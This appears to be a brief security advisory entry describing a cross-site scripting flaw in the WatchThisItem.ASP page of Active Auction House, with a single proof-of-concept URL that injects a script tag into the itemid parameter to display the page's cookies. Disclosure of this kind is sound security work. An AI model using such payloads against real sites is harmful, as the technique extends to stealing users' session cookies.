|
Active Auction House WatchThisItem.ASP Cross-Site Scripting Vulnerability
No exploit is required. The following proof of concept is available: http://www.example.com/activeauctionsuperstore/watchthisitem.asp?itemid="><script>alert(document.cookie)</script>&amp%3baccountid= |
|
|
Privacy Statement |